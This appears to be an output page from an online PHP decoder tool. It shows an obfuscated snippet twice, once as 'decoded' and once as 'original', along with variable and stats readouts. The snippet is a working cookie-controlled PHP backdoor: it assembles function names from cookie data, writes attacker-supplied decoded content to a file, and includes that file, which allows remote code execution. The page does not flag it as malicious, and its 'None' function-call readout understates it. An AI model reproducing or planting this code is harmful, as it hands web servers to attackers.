Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $c=$_COOKIE;$k=0;$n=9;$p=array();$p[$k]='';while($n){$p[$k].=$c[27][$n];if(!$c[27..

Decoded Output download

<?php 
 
$c=$_COOKIE;$k=0;$n=9;$p=array();$p[$k]='';while($n){$p[$k].=$c[27][$n];if(!$c[27][$n+1]){if(!$c[27][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+9+1;}$k=$p[14]().$p[11];if(!$p[18]($k)){$n=$p[25]($k,$p[27]);$p[28]($n,$p[15].$p[22]($p[19]($c[3])));}include($k); 
 
phpinfo();?>

Did this file decode correctly?

Original Code

<?php

$c=$_COOKIE;$k=0;$n=9;$p=array();$p[$k]='';while($n){$p[$k].=$c[27][$n];if(!$c[27][$n+1]){if(!$c[27][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+9+1;}$k=$p[14]().$p[11];if(!$p[18]($k)){$n=$p[25]($k,$p[27]);$p[28]($n,$p[15].$p[22]($p[19]($c[3])));}include($k);

phpinfo();?>

Function Calls

None

Variables

$c 0
$k 0
$n 9
$p [{'key': 0, 'value': ''}]

Stats

MD5 2dbba2f4f761d9bd65e300d06d4e5440
Eval Count 0
Decode Time 64 ms